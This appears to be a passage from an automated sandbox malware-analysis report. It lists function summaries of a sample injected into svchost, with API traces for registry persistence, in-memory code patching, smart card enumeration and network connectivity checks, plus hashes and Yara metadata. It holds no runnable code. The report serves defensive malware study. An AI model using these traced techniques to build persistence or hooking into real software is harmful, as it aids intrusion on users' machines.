                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 02CAA159
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(?,software\microsoft,00000000,00000102,02CAA33F,?,02CAA33F), ref: 02CAA173
                                                                                                                                                                                                              • RegSetValueExA.KERNEL32(02CAA33F,5dd2beaba,00000000,00000004,00000004,00000004,02CAA33F), ref: 02CAA190
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(?), ref: 02CAA19A
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02CAA1A4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AdminCloseCountFlushOpenTickUserValue
                                                                                                                                                                                                              • String ID: 5dd2beaba$software\microsoft
                                                                                                                                                                                                              • API String ID: 287100044-3143834697
                                                                                                                                                                                                              • Opcode ID: a4ee62259bbb09a756004b63df9f38a92f8cc71f9b4994934be1f519763daf4e
                                                                                                                                                                                                              • Instruction ID: 81fdc1bcb626beed162fd3fab8ddd0dfe9c29b686c964865a0d8ac25b74f98f6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4ee62259bbb09a756004b63df9f38a92f8cc71f9b4994934be1f519763daf4e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1F06275982218FBE700EBA0DD49FAE7B7CEB04742F904654FA02E6180D6716A108BE0
                                                                                                                                                                                                              Function 02CB5A50 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 118COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02CB5A7F
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 02CB5AB8
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CB5B23
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CB5B86
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _snprintf$DirectoryInformationSystemVolumeWindows
                                                                                                                                                                                                              • String ID: 1234567890QWERTYUIOPASDFGHJKLZXCVBNM$5DD2BE37a$A23C419D
                                                                                                                                                                                                              • API String ID: 2823094833-986658936
                                                                                                                                                                                                              • Opcode ID: 0a9b43516b0c8804496d153133795425025a9deb5ea9d89ef1ff770cf5260127
                                                                                                                                                                                                              • Instruction ID: 6e584532139d2b7aafd2bb49cd03dc416d7c9524ff283a68d03bcd546193c4ae
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a9b43516b0c8804496d153133795425025a9deb5ea9d89ef1ff770cf5260127
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B5415CB1A00219ABDB11CF68CD84BEEF7FAEF94340F9541A4D649EB280D7B15B098780
                                                                                                                                                                                                              Function 02CA5AF0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 51registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CA5B18
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(02CA6C37,5dd2b9dea,00000000,?,00000000,?), ref: 02CA5B5A
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(02CA6C37), ref: 02CA5B64
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(-80000001), ref: 02CA5B2A
                                                                                                                                                                                                                • Part of subcall function 02C93420: IsUserAnAdmin.SHELL32 ref: 02C93428
                                                                                                                                                                                                                • Part of subcall function 02C93420: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02CA5B76), ref: 02C9345F
                                                                                                                                                                                                                • Part of subcall function 02C93420: RegQueryValueExA.ADVAPI32(02CA5B76,5dd2bf39a,00000000,?,00000000,?), ref: 02C9347C
                                                                                                                                                                                                                • Part of subcall function 02C93420: RegCloseKey.ADVAPI32(02CA5B76), ref: 02C93486
                                                                                                                                                                                                                • Part of subcall function 02C93420: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C934B9
                                                                                                                                                                                                                • Part of subcall function 02C93420: RegQueryValueExA.KERNEL32(?,5dd2bf39a,00000000,?,00000000,?), ref: 02C934D6
                                                                                                                                                                                                                • Part of subcall function 02C93420: RegCloseKey.ADVAPI32(?), ref: 02C934E0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                              • String ID: 5DD2B667a$5dd2b9dea$software\microsoft
                                                                                                                                                                                                              • API String ID: 2113243795-3349802430
                                                                                                                                                                                                              • Opcode ID: ff2793cf673d2edf79b47908a1912db4f633a469a1da6ee894da3984d1500278
                                                                                                                                                                                                              • Instruction ID: 6b56ff3aa1ebf7b380f7045394044e923f83723fd4ca6b7068758828cdbcb33e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff2793cf673d2edf79b47908a1912db4f633a469a1da6ee894da3984d1500278
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 970192B5E9120AABEF00DBF4DC45BAEB7B8AB04645F804658F515E7280E7749A008B90
                                                                                                                                                                                                              Function 02CAA540 Relevance: 12.1, APIs: 8, Instructions: 139memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,74DEF550,00000000,75BFBD50,?,?,?,02CA98DA,00000000,02CA9730,02CEA04C), ref: 02CAA578
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02CAA5A0
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,?,00000040,02CA98DA,?,?,?,?,?,?,02CA98DA,00000000,02CA9730,02CEA04C), ref: 02CAA635
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000000,00000040,02CA98DA,?,?,?,?,?,?,02CA98DA,00000000,02CA9730,02CEA04C), ref: 02CAA64A
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000000,02CA98DA,?,?,?,00000000,00000000,?,?,?,?,?,?,02CA98DA,00000000), ref: 02CAA67A
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000000,02CA98DA,?,?,?,?,?,?,?,02CA98DA,00000000,02CA9730,02CEA04C), ref: 02CAA686
                                                                                                                                                                                                                • Part of subcall function 02CAA6B0: WaitForSingleObject.KERNEL32(?,000003E8,00000000,02CAA693,?,?,?,?,?,?,02CA98DA,00000000,02CA9730,02CEA04C), ref: 02CAA6BC
                                                                                                                                                                                                                • Part of subcall function 02CAA6B0: GetProcessHeap.KERNEL32(00000008,00000030,?,?,?,?,?,?,02CA98DA,00000000,02CA9730,02CEA04C), ref: 02CAA6C6
                                                                                                                                                                                                                • Part of subcall function 02CAA6B0: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,02CA98DA,00000000,02CA9730,02CEA04C), ref: 02CAA6CD
                                                                                                                                                                                                                • Part of subcall function 02CAA6B0: memset.MSVCRT ref: 02CAA6DE
                                                                                                                                                                                                                • Part of subcall function 02CAA6B0: ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,02CA98DA,00000000,02CA9730,02CEA04C), ref: 02CAA72A
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,74DEF550,00000000,75BFBD50,?,?,?,02CA98DA,00000000,02CA9730,02CEA04C), ref: 02CAA697
                                                                                                                                                                                                              • FlushInstructionCache.KERNEL32(00000000,?,?,?,02CA98DA,00000000,02CA9730,02CEA04C), ref: 02CAA69E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Virtual$Protect$AllocHeapProcess$CacheCurrentFlushInstructionMutexObjectReleaseSingleWaitmemcpymemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2609073853-0
                                                                                                                                                                                                              • Opcode ID: 9f374aeccda4d00e945f1299877f00db1003c17fe1813348f2ca37fe2434aac9
                                                                                                                                                                                                              • Instruction ID: d9c1ff16e4d02cd48b988443a92d2596caba60bc44a2ca9d2847925569e6a009
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9f374aeccda4d00e945f1299877f00db1003c17fe1813348f2ca37fe2434aac9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45413C76A00617ABCB109EBC8C94FBE7B7AEF80358F44462CE54597384D635DA01CBA4
                                                                                                                                                                                                              Function 00402360 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74filetimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004023F6
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 00402416
                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040241C
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040243A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040243D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$TimeWrite$CloseCreateHandleSystem
                                                                                                                                                                                                              • String ID: \\.\pipe\acsipc_server
                                                                                                                                                                                                              • API String ID: 3225117150-898603304
                                                                                                                                                                                                              • Opcode ID: 09079f795ad6bdb91afb2c9b6928e581e643feef602d34b17a80bf8da01f816f
                                                                                                                                                                                                              • Instruction ID: f0829fbf90d271a43df41d43683be69a37a07176176bc6acbc5691eaf7b0b3d2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09079f795ad6bdb91afb2c9b6928e581e643feef602d34b17a80bf8da01f816f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA31F2B1C0121CAFDB10DFD9D985AEEFBB8FB48314F10422AE614BB280D7B41A458F95
                                                                                                                                                                                                              Function 02CAA7B0 Relevance: 10.6, APIs: 7, Instructions: 72memorysynchronizationsleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000003E8), ref: 02CAA7CB
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000018,00000040,?), ref: 02CAA818
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 02CAA847
                                                                                                                                                                                                              • FlushInstructionCache.KERNEL32(00000000), ref: 02CAA84E
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000018,?,?), ref: 02CAA862
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(?), ref: 02CAA879
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02CAA881
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ProtectVirtual$CacheCurrentFlushInstructionMutexObjectProcessReleaseSingleSleepWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 842647815-0
                                                                                                                                                                                                              • Opcode ID: 63553c969955411e51e6e43582ec2dfbc6a1679a5b330eceddbda45b3206bdd2
                                                                                                                                                                                                              • Instruction ID: 0f673f4757ac37d5f0e5df8f8ae83902c276c5e3aaf5b0068519aaa1319b1080
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 63553c969955411e51e6e43582ec2dfbc6a1679a5b330eceddbda45b3206bdd2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7212A75A41702EFD724CF59C994F5AB7B5FF88704F108A08EA4A9B690C730FA15CB90
                                                                                                                                                                                                              Function 02CB5850 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SCardEstablishContext.WINSCARD(00000002,00000000,00000000,02CA6A83,00000000), ref: 02CB5875
                                                                                                                                                                                                              • SCardListReadersA.WINSCARD(02CA6A83,00000000,?,FFFFFFFF), ref: 02CB588C
                                                                                                                                                                                                              • SCardConnectA.WINSCARD(02CA6A83,?,00000002,00000003,?,?), ref: 02CB58BE
                                                                                                                                                                                                              • SCardDisconnect.WINSCARD(?,00000000), ref: 02CB58E9
                                                                                                                                                                                                              • SCardFreeMemory.WINSCARD(02CA6A83,?), ref: 02CB5905
                                                                                                                                                                                                              • SCardReleaseContext.WINSCARD(02CA6A83), ref: 02CB5913
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Card$Context$ConnectDisconnectEstablishFreeListMemoryReadersRelease
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3231658416-0
                                                                                                                                                                                                              • Opcode ID: eb795e213246378446c046e1354bb18628f94c915c3744dec78aa4d947bdaa0b
                                                                                                                                                                                                              • Instruction ID: 723687c3ce968101d5a976d313956e84e872c3c03b99a1bf7a18ec91514c66b0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb795e213246378446c046e1354bb18628f94c915c3744dec78aa4d947bdaa0b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F218F71E40309ABDF22CF95C848FEEB7B9AF84740F544649E900E7140E7719B05CBA0
                                                                                                                                                                                                              Function 02C96DE0 Relevance: 7.6, APIs: 5, Instructions: 81sleepthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C96E00
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: IsNetworkAlive.SENSAPI(02C96E0D,00000000), ref: 02CA4F93
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: IsUserAnAdmin.SHELL32 ref: 02CA4FA1
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: DnsFlushResolverCache.DNSAPI ref: 02CA4FAB
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: memset.MSVCRT ref: 02CA4FC8
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,74DF0F10), ref: 02CA4FE7
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02CA5000
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02CA5013
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: memset.MSVCRT ref: 02CA502C
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,74DF0F10), ref: 02CA5045
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02CA5058
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02CA5065
                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4,?,00000000,00000000), ref: 02C96E1C
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00006A90,00000000,00000000,00000000), ref: 02C96E78
                                                                                                                                                                                                              • WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,74DF0F10,?,00000000,00000000), ref: 02C96EA0
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 02C96EB8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$CheckConnectionInternetlstrcpyn$AdminAliveCacheCloseCreateFlushHandleMultipleNetworkObjectsResolverSleepThreadUserWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2160739018-0
                                                                                                                                                                                                              • Opcode ID: f25b4ca56657bcbd31c5616be5d88b101b8466860e6f5db6269f5224edd41f39
                                                                                                                                                                                                              • Instruction ID: 3870706b0038dc9326a752f53c6db1a2188c56e4063defc1b8d47a4a36630564
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f25b4ca56657bcbd31c5616be5d88b101b8466860e6f5db6269f5224edd41f39
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72215EB1A803546BEF209B65DC88F6E325EA784744F610735EB09D71C0D7B0DD818AD9
                                                                                                                                                                                                              Function 02CA8080 Relevance: 7.6, APIs: 5, Instructions: 68sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathFindFileNameA.SHLWAPI(?), ref: 02CA80CA
                                                                                                                                                                                                              • FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 02CA8108
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 02CA8123
                                                                                                                                                                                                              • FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 02CA812A
                                                                                                                                                                                                              • Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 02CA8151
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 433761119-0
                                                                                                                                                                                                              • Opcode ID: bd254ddcb65efb8cec5467822fc5a4b2ce8563508ca5eb6e35145d59ce0b091a
                                                                                                                                                                                                              • Instruction ID: 292b0fc82590c495eeecbc1d88a0f12cabac05bd617ced30f12b42bd5960af42
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd254ddcb65efb8cec5467822fc5a4b2ce8563508ca5eb6e35145d59ce0b091a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92213A30C4120BDBDB1187A89C28BEA37A86B51348F104BA1DA45D72C0DBB0CA44CFE1
                                                                                                                                                                                                              Function 02CA80A6 Relevance: 7.6, APIs: 5, Instructions: 54sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathFindFileNameA.SHLWAPI(?), ref: 02CA80CA
                                                                                                                                                                                                              • FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 02CA8108
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 02CA8123
                                                                                                                                                                                                              • FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 02CA812A
                                                                                                                                                                                                              • Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 02CA8151
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 433761119-0
                                                                                                                                                                                                              • Opcode ID: dc4acf3090d8fe2d79c1e1ef6ece2937d130334a2d6d7d59e13b886f2843ef0e
                                                                                                                                                                                                              • Instruction ID: 8f032028ec4323fb02ec91212d1cdabfec41129bb79d8763de80638d8aa4d4d7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc4acf3090d8fe2d79c1e1ef6ece2937d130334a2d6d7d59e13b886f2843ef0e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1111C13084121ADBDB21CB64CC58BDA77B8BF51348F144B94DA15A72C0DB709B44CFA1
                                                                                                                                                                                                              Function 02C96A90 Relevance: 7.5, APIs: 5, Instructions: 42memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02C96AB4
                                                                                                                                                                                                                • Part of subcall function 02C96980: memset.MSVCRT ref: 02C969A2
                                                                                                                                                                                                                • Part of subcall function 02C96980: memset.MSVCRT ref: 02C969C0
                                                                                                                                                                                                                • Part of subcall function 02C96980: lstrcpynA.KERNEL32(?,?,00000104), ref: 02C969DD
                                                                                                                                                                                                                • Part of subcall function 02C96980: RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,?,?,?), ref: 02C96A4D
                                                                                                                                                                                                                • Part of subcall function 02C96980: RegSetValueExA.ADVAPI32(?,5DD2BAAFa,00000000,00000001,?,00000104), ref: 02C96A6F
                                                                                                                                                                                                                • Part of subcall function 02C96980: RegCloseKey.ADVAPI32(?), ref: 02C96A7D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02C96AE4
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02C96AE7
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02C96AF4
                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000), ref: 02C96AF7
                                                                                                                                                                                                                • Part of subcall function 02C96690: memset.MSVCRT ref: 02C966B0
                                                                                                                                                                                                                • Part of subcall function 02C96690: calloc.MSVCRT ref: 02C9670F
                                                                                                                                                                                                                • Part of subcall function 02C96690: exit.MSVCRT ref: 02C9671F
                                                                                                                                                                                                                • Part of subcall function 02C96690: calloc.MSVCRT ref: 02C96729
                                                                                                                                                                                                                • Part of subcall function 02C96690: exit.MSVCRT ref: 02C96734
                                                                                                                                                                                                                • Part of subcall function 02C96690: calloc.MSVCRT ref: 02C9674F
                                                                                                                                                                                                                • Part of subcall function 02C96690: exit.MSVCRT ref: 02C9675C
                                                                                                                                                                                                                • Part of subcall function 02C96690: calloc.MSVCRT ref: 02C96766
                                                                                                                                                                                                                • Part of subcall function 02C96690: exit.MSVCRT ref: 02C96771
                                                                                                                                                                                                                • Part of subcall function 02C96690: calloc.MSVCRT ref: 02C96794
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: calloc$Heapexit$memset$Process$AdminCloseFreeOpenUserValidateValuelstrcpyn
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1728208919-0
                                                                                                                                                                                                              • Opcode ID: da0a683705e017697dafbfa1902021094027ad29feaaccc299bfa8d9c8b489ce
                                                                                                                                                                                                              • Instruction ID: 3800625931f25ecdbaeb3ad372cd3e2f57fd2879adc29917c4ac6e11c3faecf9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: da0a683705e017697dafbfa1902021094027ad29feaaccc299bfa8d9c8b489ce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34F0C8729C2215A7CE207AA1E80CB9B765CEBC0792F548515F605D7180CBB5D060C6F0
                                                                                                                                                                                                              Function 00402450 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402468
